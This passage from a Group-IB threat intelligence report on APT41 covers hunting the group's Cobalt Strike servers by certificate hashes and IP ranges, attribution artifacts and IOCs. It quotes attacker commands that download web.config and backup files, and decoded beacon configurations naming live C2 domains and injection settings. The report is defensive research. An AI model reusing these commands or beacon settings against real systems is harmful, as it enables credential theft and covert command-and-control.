c:\\Program Files (x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Web\\web.config; download c:\\Program Files (x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Web_OSCE\\Web_console\\HTML\\widget_old\\repository\\inc\\class\\common\\crypt\\web.config ;\r\ndownload c:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config; download\r\nc:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\web.config; download\r\nc:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config; download\r\nc:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\web.config; download\r\nc:\\Windows\\WinSxS\\amd64_clientdeployment-connectsite_31bf3856ad364e35_10.0.14393.0_none_d2443e4100c72a7c\\web.config; download c:\\Users\\\r\n{redacted}\\Desktop\\Office Scan Backup\\Private\\AosBackup.txt\r\nHunting for APT41 Cobalt Strike servers\r\nThis section explains how to hunt for APT41’s network infrastructure. The group usually uses certain servers exclusively to\r\nhost the Cobalt Strike framework, while they exploit others only for active scanning through Acunetix. The Group-IB TI\r\nteam identified servers that were used for both, however. It is important that all APT41 servers were protected using the\r\ncloud service CloudFlare, which hides the real server addresses. That said, the Group-IB Threat Intelligence system detects\r\nserver backends belonging to various threat actors, including APT41.\r\nAs a result, our clients are among the first to proactively block new servers belonging to threat actors.\r\nTo identify APT41 infrastructure, it is essential to describe how Cobalt Strike operates.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 12 of 23\n\nThis framework serves as an intermediate server to which threat actors can connect from other devices. Other devices\r\nconnect to the Cobalt Strike server (usually, but not always) on port 50050. By default, the server generates a self-signed\r\nSSL certificate, which contains the “Cobalt Strike” strings.\r\nOne of the default Cobalt Strike certificates\r\nHowever, the servers used in these campaigns have different certificates on this port: the two certificates below, with the\r\nvalues “fortawesome”, are unique and clearly indicate that this Cobalt Strike image belongs to APT41.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 13 of 23\n\nSSL-cert SHA1-8c93083440cd9ce5fe4cf58c3348bd85bdf07f6c\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 14 of 23\n\nSSL-cert SHA1-8c93083440cd9ce5fe4cf58c3348bd85bdf07f6c\r\nThe next major feature of Cobalt Strike that the Group-IB team discovered is the use of custom SSL certificates on listeners.\r\nListeners are used to accept connections from the payload in order to maintain communication between bots and the C\u0026C\r\nserver. The group uses SSL certificates for HTTPS listeners. In the examples below, APT41 used unique SSL certificates\r\nthat mimicked “Microsoft”, “Facebook” and “CloudFlare”.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 15 of 23\n\nSSL-cert SHA1-0cc907db409a259611f56abc7dead19c6ed51fd0\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 16 of 23\n\nSSL-cert SHA1-afef10f23f1403761173557178c21308461778ba\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 17 of 23\n\nSSL-cert SHA1-4690a60aa5e6e323ad04993bf0076e9c78e7413c\r\nAccording to Group-IB Threat Intelligence data, servers with such certificates first emerged in early 2020. By the end of\r\n2021, their number reached 106. This means that the Group-IB team discovered more than 100 Cobalt Strike servers that are\r\nused only by APT41. Unsurprisingly, most are no longer active.\r\nArtifacts and other noteworthy findings\r\nChinese strings\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 18 of 23\n\nAn analysis conducted by Group-IB experts revealed the following key artifacts pointing to the origin of APT41:\r\nUsing mainly Chinese IP addresses to communicate with Cobalt Strike servers.\r\n171.208.242.0/24 CHINANET 171.208.241.0/24 CHINANET 110.191.217.0/24 CHINANET 102.223.72.0/22\r\nSUNNETWORK-SA 103.165.84.0/24 GEM1-HK 178.79.128.0/18 US-LINODE-20100510 45.152.112.0/23 ALANYHQ\r\n60.248.225.0/24 HINET-NET 61.221.57.0/24 HINET-NET\r\nUsing Chinese characters on the devices from which the attacks were conducted.\r\nUsing a specific Pinyin format for directory names.\r\nPinyin is a romanization system that represents the sounds of the Chinese language through the use of the Latin\r\nalphabet. In the case below, a directory is called “yuming”, which in Chinese means “domain name”.\r\nSeparate directories are used for certain organizations.\r\n“Working” hours” of APT41\r\nResearch into APT41 malware campaigns dated 2021 helped align all the group’s timestamps to UTC+8. As a result, we\r\nhave come to the following conclusions. The group starts working at 9 AM and its activity stops around 7 PM. It is clear that\r\nAPT41 members do not work long hours, unlike financially motivated hacker groups like Conti, for example. Groups like\r\nConti tirelessly “work” 14 hours a day without any days off, which we described in detail in our report titled “CONTI\r\nARMADA: THE ARMATTACK CAMPAIGN”.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 19 of 23\n\nAccording to this map, the following countries are located in this time zone:\r\nRussia\r\nAustralia\r\nMalaysia\r\nSingapore\r\nChina\r\nand others\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 20 of 23\n\nConclusion\r\nFor a long time, security researchers believed that hacked legitimate pentesting and red teaming tools, which are widely used\r\nby hacker groups, make threat hunting and attribution more difficult. Among such tools, Cobalt Strike stands out. In the past,\r\nthe tool was appreciated by cybercriminal gangs targeting banks, while today it is popular among various threat actors\r\nregardless of their motivation, including infamous ransomware operators. That is why it is essential to proactively discover\r\nservers running this framework and to attribute those servers to specific threat actors. It is a crucial task for all cybersecurity\r\nteams that want to prevent attacks.\r\nIn this blog post, we shared examples of identifying and correlating Cobalt Strike with campaigns conducted by the state-sponsored group APT41. Thanks to our proprietary Group-IB Threat Intelligence system, which detects and attributes such\r\nattacks automatically, our clients are the first to be informed about cyberthreats, including all the relevant indicators of\r\ncompromise and TTPs. They are also the first to obtain the names of compromised organizations, which helps them avoid\r\nsupply-chain attacks and make their network infrastructure more secure.\r\nIn line with Group-IB’s mission of fighting cybercrime, we will continue to explore the methods, tools, and tactics used by\r\none of the oldest and still dangerous groups, APT41. We will also continue to inform and warn targeted organizations\r\nworldwide. We always strive to ensure that organizations under attack are notified as quickly as possible to help reduce\r\npotential damage. We also consider it our responsibility to share our findings with the cybersecurity community and\r\nencourage researchers to study advanced threats, share data, and use our technologies to combat cybercrime — together.\r\nIf you are interested in what we do and would like to become an expert in the same field, you can take our Digital Forensics,\r\nIncident Response, and Threat Intelligence training courses. We also welcome applications to join the Group-IB team.\r\nPlease check our vacancies on the website.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 21 of 23\n\nIOCs\r\nIP\r\nFirst\r\nseen\r\nLast\r\nseen\r\nC\u0026C domains\r\n45.142.214[.]242\r\n2021-\r\n04-12\r\n2021-\r\n07-08\r\ndelaylink[.]tk,javaupdate.biguserup[.]workers.dev\r\n45.153.231[.]31\r\n2021-\r\n05-31\r\n2021-\r\n06-26\r\n45.144.31[.]31\r\n2021-\r\n06-04\r\n2021-\r\n06-26\r\ncolunm[.]tk\r\n45.142.214[.]56\r\n2021-\r\n06-09\r\n2021-\r\n07-20\r\nmute-pond-371d.zalocdn[.]workers.dev,cs16.dns04[.]com\r\n45.140.146[.]169\r\n2021-\r\n07-21\r\n2021-\r\n08-10\r\ngentle-voice-65e3.bsnl[.]workers.dev,newimages.socialpt2021[.]tk,updata.microsoft-api[.]workers.dev\r\n45.142.212[.]47\r\n2021-\r\n10–11\r\n2021-\r\n11-08\r\nsocialpt2021[.]club,mute-pond-371d.zalocdn[.]workers.dev\r\n185.250.150[.]22\r\n2021-\r\n08-16\r\n2021-\r\n08-31\r\nmute-pond-371d.zalocdn[.]workers.dev\r\n45.133.216[.]21\r\n2021-\r\n07-29\r\n2021-\r\n08-10\r\n45.153.231[.]32\r\n2020-\r\n11-03\r\n2021-\r\n07-08\r\n185.118.166[.]66\r\n2020-\r\n12-11\r\n2021-\r\n05-19\r\ncolunm[.]tk\r\nCobalt Strike Beacons\r\n45.142.214.242: \"config_payload\": { \"process-inject-stub\": \"fbM7aRSiLoJ01wyIz1ATTQ==\", \"http-get.uri\":\r\n\"javaupdate.biguserup.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\", \"post-ex.spawnto_x86\":\r\n\"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"watermark\": 305419896, \"process-inject-use-rwx\": 64, \"dns_idle\":\r\n134744072, \"sleeptime\": 60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCY/kAU3i5Cw6hXsXbgonByGxgt0JXT5y/KjC2e0rebpLU+6cncSPuWZUo24BqPBjVD0bR\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*2Referer: https://javaupdate.biguserup.workers.dev/Accept-Encoding:\r\n*\u0026Host: javaupdate.biguserup.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"531c720aae6e053b9db9be8e7b56f78f\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41, \"cookieBeacon\": 1, \"port\": 443,\r\n\"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *\u0026Host: javaupdate.biguserup.workers.devAccept:\r\n*/*2Referer: https://javaupdate.biguserup.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0\" } },\r\n45.144.31.31: config_payload\": { \"process-inject-stub\": \"d5nX4wNnwCo18Wx3jr4tPg==\", \"http-get.uri\":\r\n\"cs.colunm.tk,/__utm.gif\", \"http-get.server.output\": \"\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\", \"watermark\": 305419896, \"process-inject-use-rwx\": 64,\r\n\"sleeptime\": 60000, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCBkyCWDMC1Q6VqRZIY35+iU7KtrHy9+HnzzPxCetQ5toPMCqlwQEB9hj38OnrVdGJY\r\n\"maxdns\": 255, \"http-post.client\": \"\u0026Content-Type: application/octet-streamid\", \"ssl\": true, \"publickey_md5\":\r\n\"9cdb3fca6156c6cbed2f01d6431b3dfb\", \"http-post.uri\": \"/submit.php\", \"cookieBeacon\": 1, \"port\": 8443, \"process-inject-start-rwx\": 64, \"http-get.client\": \"Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2, \"user-agent\": \"Mozilla/5.0 (compatible;\r\nMSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MANM; MANM)\" }\r\n45.142.212.47: \"config_payload\": { \"process-inject-stub\": \"9LoFKCrbYlLergvfu7Ki8A==\", \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\", \"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\":\r\n\"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\", \"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\",\r\n\"process-inject-use-rwx\": 64, \"dns_idle\": 134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC3WFlrP6k0u+i8ozfzb2lLZHkTokxc3l8Hzysu+yF7wHEG7FSX9wC10GMQ3FDGYzgiH/0\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *\r\n(Host: mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"a9020b0e5342fb8877d2fb213802132f\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41, \"cookieBeacon\": 1, \"port\": 443,\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 22 of 23\n\n\"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept:\r\n*/*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko)\r\nVersion/4.0\" } },\r\n185.250.150.22: \"config_payload\": { \"http-get.uri\": \"mute-pond-371d.zalocdn.workers.dev,/jquery-3.3.1.min.js\",\r\n\"stage.cleanup\": 1, \"http-get.server.output\": \"`T\", \"post-ex.spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe -k netsvcs\",\r\n\"post-ex.spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe -k netsvcs\", \"process-inject-use-rwx\": 64, \"dns_idle\":\r\n134744072, \"sleeptime\": 32547, \"publickey\":\r\n\"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCQ2/teGq2eUgU2sZjiJCCcKH7RgQrsICSgVdA9hT26lhijhrN8zcv9V5oORMREIMAjGCy\r\n\"maxdns\": 255, \"http-post.client\": \"Accept: */*4Referer: https://mute-pond-371d.zalocdn.workers.dev/Accept-Encoding: *\r\n(Host: mute-pond-371d.zalocdn.workers.dev__cfduid\", \"ssl\": true, \"publickey_md5\":\r\n\"398c270c67cd915134ebbf7108090789\", \"http-post.uri\": \"/jquery-3.2.2.min.js\", \"jitter\": 41, \"cookieBeacon\": 1, \"port\": 443,\r\n\"process-inject-start-rwx\": 64, \"http-get.client\": \"Accept-Encoding: *(Host: mute-pond-371d.zalocdn.workers.devAccept:\r\n*/*4Referer: https://mute-pond-371d.zalocdn.workers.dev/__cfduid=Cookie\", \"http-get.verb\": \"GET\", \"proxy_type\": 2,\r\n\"user-agent\": \"Mozilla/5.0 (Linux; Android 7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko)\r\nVersion/4.0\" }\r\nSource: https://blog.group-ib.com/apt41-world-tour-2021\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.group-ib.com/apt41-world-tour-2021"
	],
	"report_names": [
		"apt41-world-tour-2021"
	],
	"threat_actors": [],
	"ts_created_at": 1777605032,
	"ts_updated_at": 1777605050,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f254057fef99f7fe265e4a8a770f2f7099827cd.pdf",
		"text": "https://archive.orkl.eu/9f254057fef99f7fe265e4a8a770f2f7099827cd.txt",
		"img": "https://archive.orkl.eu/9f254057fef99f7fe265e4a8a770f2f7099827cd.jpg"
	}
}